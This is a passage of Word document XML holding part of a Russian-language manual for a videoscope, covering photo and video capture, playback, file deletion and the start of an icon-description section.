        <w:t>изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C86290" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C86290">
        <w:t>Выполнение</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:t>фотосъемки</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 режиме рабочего экрана убедитесь в наличии значка камеры в верхней левой части экрана. Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы сделать фотоснимок, который немедленно сохраняется во внутреннюю память или на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(при наличии).</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6160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3041650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1471295" cy="1134110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15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7129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tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Число под значком камеры указывает количество фотоснимков, которые можно сохранить в свободной области памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C86290" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C86290">
        <w:t>Выполнение</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:t>видеосъемки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="4019"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В режиме рабочего экрана убедитесь в наличии значка видеокамеры в верхней левой части экрана. Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы начать видеозапись (см. рисунок 22). В верхней правой части экрана под значком индикатора заряда батареек будет отображаться красный значок </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>REC</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, указывающий на активность режима видеозаписи.</w:t>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 верхней левой части экрана под значком видеокамеры отображается таймер, указывающий продолжительность видеозаписи с момента ее начала. Повторно нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы остановить</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>видеозапись.</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7184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3056890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1443990" cy="1083310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="154"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3990" cy="108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Сохранение видеозаписи во внутреннюю память может потребовать нескольких секунд. Без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видеоскоп способен сохранить видеозаписи суммарной продолжительностью не более 80</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ПРИМЕЧАНИЕ. Перед записью видео проверьте показание таймера под значком видеокамеры, чтобы определить продолжительность видеозаписи, которую можно сохранить в свободной области памяти. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251678208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3056890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>121920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1443355" cy="1083310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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3355" cy="108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C86290" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C86290">
        <w:t>Воспроизведение и удаление фотоснимков и</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:t>видеозаписей</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Для просмотра фотоснимков и видеозаписей нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>воспроизведения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Каждый фотоснимок и видеозапись сохраняются в отдельном файле соответствующего формата.</w:t>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2C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4191000" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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1000" cy="3185160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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81280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3403600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>944880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1463040" cy="1096645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15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304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2F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Во время просмотра фотоснимков и видеозаписей нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы выбрать соответствующий файл. После этого на экране отобразится окно. Цифры в верхней левой части экрана указывают порядковый номер и общее количество воспроизводимых файлов, содержащихся в папке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>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влево</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы воспроизвести предыдущий файл, или кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>вправо</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы воспроизвести следующий файл. Или нажмите кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>вверх</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы воспроизвести вышерасположенный файл, при этом нажатие кнопки со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вниз </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>позволяет воспроизвести нижерасположенный файл.</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Во время выбора видеозаписи нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы начать, приостановить или возобновить воспроизведение видеозаписи. Для полного прекращения воспроизведения можно в любое время нажать кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Во время просмотра фотоснимка или видеозаписи нажатие кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">удаления/поворота </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">позволяет удалить сохраненные файлы. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Удаление необходимо подтвердить в нижеследующем окне запроса. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1478280" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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8280" cy="1120140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7801"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Да]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы подтвердить выбор, после чего нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">для удаления файла, или выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Нет]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы отменить команду, а затем нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>для перехода к предыдущему окну.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Файлы фотоснимков и видеозаписей можно удалить только поодиночке!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-- После удаления всех фотоснимков или видеозаписей появится сообщение </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No Files Available [Доступные файлы отсутствуют]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41"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82304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3037205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1463675" cy="1111250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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3675"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33B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_bookmark24"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Описание значков</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дисплея</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1416"/>
          <w:tab w:val="left" w:pos="1417"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
